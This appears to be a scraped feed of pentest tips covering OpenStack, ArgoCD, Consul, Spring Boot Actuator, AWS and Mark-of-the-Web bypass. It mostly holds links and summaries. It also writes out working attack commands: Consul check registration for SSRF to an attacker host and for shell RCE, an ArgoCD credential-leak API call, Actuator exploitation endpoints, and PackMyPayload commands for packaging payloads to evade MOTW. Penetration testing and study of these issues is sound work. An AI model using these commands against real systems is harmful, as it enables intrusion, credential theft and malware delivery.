Openstack pentest
Articles
OpenStack from a penetration tester perspective
Part 1
Part 2
Part 3
Tool
openstack-security-tool
Articles
OpenStack from a penetration tester perspective
Part 1
Part 2
Part 3
Tool
openstack-security-tool
Medium
OpenStack from a penetration tester perspective: Part 1
Hello everyone,
❤5🐳3🤯1
ArgoCD - Declarative, GitOps tool for continuous delivery on Kubernetes
Template for deploying pod and code execution within a cluster - Link
CVE-2024-31989
CVE-2025-55190
Hardening
Template for deploying pod and code execution within a cluster - Link
CVE-2024-31989
* Use of Risky or Missing Cryptographic Algorithms in Redis Cache (Summary & PoC)
* Redis or Not – Revealing a Critical Vulnerability in Argo CD Kubernetes Controller
CVE-2025-55190
Argo CD's Project API Token Exposes Repository Credentials
curl -sH "Authorization: Bearer $ARGOCD_API_TOKEN" \
"https://argocd.example.com/api/v1/projects/myProject/detailed"
Hardening
* Six Critical Blindspots While Securing Argo CD
* Securing Multi-Cluster ArgoCD
* Securing Continuous Delivery: Argo CD Threat Detection
GitHub
GitHub - cotsom/argocd-helloapp
Contribute to cotsom/argocd-helloapp development by creating an account on GitHub.
❤4🐳3
Consul
SSRF
Register agent
RCE
Register agent
Agents
Get check output
Unregister agent
Article - Consul by HashiCorp: from Infoleak to RCE
SSRF
Register agent
curl -X PUT -H "Content-Type: application/json" -d '{
"ID": "testservice",
"Name": "testservice",
"Address": "127.0.0.1",
"Port": 80,
"check": {
"HTTP": "http://attackerIp:attackerPort",
"interval": "10s"
}
}' http://consul-host:8500/v1/agent/service/registerRCE
Register agent
curl -X PUT -H "Content-Type: application/json" -d '{
"ID": "testservice",
"Name": "testservice",
"Address": "127.0.0.1",
"Port": 80,
"check": {
"Args": ["/bin/sh", "-c", "id"],
"interval": "10s"
}
}' http://consul-host:8500/v1/agent/service/registerAgents
Get check output
curl http://consul-host:8500/v1/agent/checks | jq
Unregister agent
curl http://consul-host:8500/v1/agent/service/deregister/testservice -X PUT
Article - Consul by HashiCorp: from Infoleak to RCE
Wallarm
🙍♂️Consul by HashiCorp: from Infoleak to RCE
Basically, Consul ensures the coherence of system components and the trust between them.☝️ Consul is at the core of your system.
❤4🐳2
Spring Boot Actuator
Article
Under the Radar: Exploring Spring Boot Actuator Misconfigurations
Recon
Exploitation
Article
Under the Radar: Exploring Spring Boot Actuator Misconfigurations
* What makes Spring Boot Actuator a treasure trove for attackers?
* Common Misconfigurations in Spring Boot Actuator
#1 Exposed HeapDump file
#2 Exposed Actuator Gateway Endpoint leading to RCE
#3 Exposed env endpoint
* How Can Organizations Defend Themselves?
Recon
* /actuator - List of all available actuator endpoints
* /actuator/mappings - All URL mappings controllers and handlers), request → method mappings
* /actuator/beans - Shows registered Spring beans
* /actuator/configprops - Values and sources ConfigurationProperties
Exploitation
* /actuator/heapdump - Exposed HeapDump file
* /actuator/env - Expose details about the runtime environment
* /actuator/httptrace - Leakage of payload structures, internal URLs, possible query data
* /actuator/loggers - Shows current logging levels and (if enabled) allows you to change logger levels at runtime
* /actuator/gateway/routes - Ssrf, can lead to rce (cve-2022-22947)
wiz.io
Exploring Spring Boot Actuator Misconfigurations | Wiz Blog
Misconfigurations in Spring Boot Actuator’s endpoints can leak environment variables, passwords, and API keys, and even lead to remote code execution.
❤3🐳2
AWS pwn
A collection of scripts for AWS penetration testing. Contains sets of scripts for
A collection of scripts for AWS penetration testing. Contains sets of scripts for
* Reconnaissance - Things to do with pre-compromise information gathering.
* Exploitation - Things that will help you gain a foothold in an account.
* Stealth - Things that might help you stay hidden after compromising an account.
* Exploration - Things to help you understand what you've pwned.
* Elevation - Things to help you move around an account and gather different levels of access.
* Persistence - Things to help maintain your access to an acccount.
* Exfiltration - Things to help you extract and move data around in AWSy ways.
GitHub
GitHub - dagrz/aws_pwn: A collection of AWS penetration testing junk
A collection of AWS penetration testing junk. Contribute to dagrz/aws_pwn development by creating an account on GitHub.
❤2🐳2
MOTW bypass
Package payloads into ISO, IMG, VHD, VHDX, ZIP, 7z, PDF, CAB for MOTW bypass
Package payloads into ISO, IMG, VHD, VHDX, ZIP, 7z, PDF, CAB for MOTW bypass
# Package a payload into an ISO that bypasses MOTW
python PackMyPayload.py payload.exe -o delivery.iso -t iso
# Package into VHD (still unpatched as of 2025+)
python PackMyPayload.py payload.exe -o delivery.vhd -t vhd
Note: As of November 2022, Microsoft patched ISO files to propagate MOTW to inner files. However, VHD/VHDX containers still bypass MOTW. Many organizations also run older Windows versions where the ISO bypass still works.
GitHub
GitHub - mgeeky/PackMyPayload: A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate…
A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats. Supports: ZIP, 7zip, PDF, ISO, IMG, CAB, VHD, V...
❤4🐳1